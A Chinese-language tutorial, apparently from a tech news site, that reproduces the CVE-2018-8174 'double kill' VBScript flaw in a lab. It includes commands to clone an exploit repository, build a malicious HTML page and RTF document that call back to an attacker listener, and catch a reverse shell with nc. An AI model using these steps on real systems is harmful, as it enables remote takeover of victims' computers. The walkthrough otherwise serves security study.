本篇文章为大家展示了如何进行0day漏洞CVE-2018-8174复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
CVE-2018-8174是Windows VBScriptEngine 代码执行漏洞,由于 VBScript 脚本执行引擎(vbscript.dll)存在该漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户受诱导或不慎点击恶意链接或文档,攻击者便可远程获取当前用户系统权限,进而完全控制用户电脑。
2018年4月18日国内某信息安全公司监控到一例使用该漏洞的攻击活动后,当天与微软公司沟通,将相关信息提交到微软。微软在4月20日确认此漏洞,于5月8号发布了官方安全补丁对其进行修复,并将其命名为 CVE-2018-8174,在国内该漏洞则被称为“双杀”漏洞。
攻击机:Linuxkali ip:192.168.1.117
靶机:Windows7专业版 ip:192.168.1.118
注:本次由于靶机环境限制,仅以网站点击恶意链接获取权限方法验证该漏洞
首先从github下载项目:
#git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
生成带有恶意VBscript的html页面和word文档
#pythonCVE-2018-8174.py -u http://192.168.220.117/exploit.html -o msf.rtf -i192.168.220.117 -p 4444
其中:-u指定URL 地址,-o指定生成文档,-i指定监听地址,-p指定监听端口
注:生成之前需进入到项目文件夹下,否则提示找不到文件
生成后ls查看当前目录下的文件,确保所需要的文件完整
将explot.html复制到/var/www/html路径下,并开启apache服务
nc指令,用于监听4444端口
开始监听后,我们用靶机,也就是windows7浏览器打开攻击机生成的恶意链接:192.168.1.117/exploit.html
虽然网页报错,但可以 发现攻击机已经拿到靶机的系统权限
此漏洞已在2018年5月8日被微软官方修复,win10不受此漏洞影响,win10以下版本安装过该补丁后不受此漏洞影响。
上述内容就是如何进行0day漏洞CVE-2018-8174复现,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。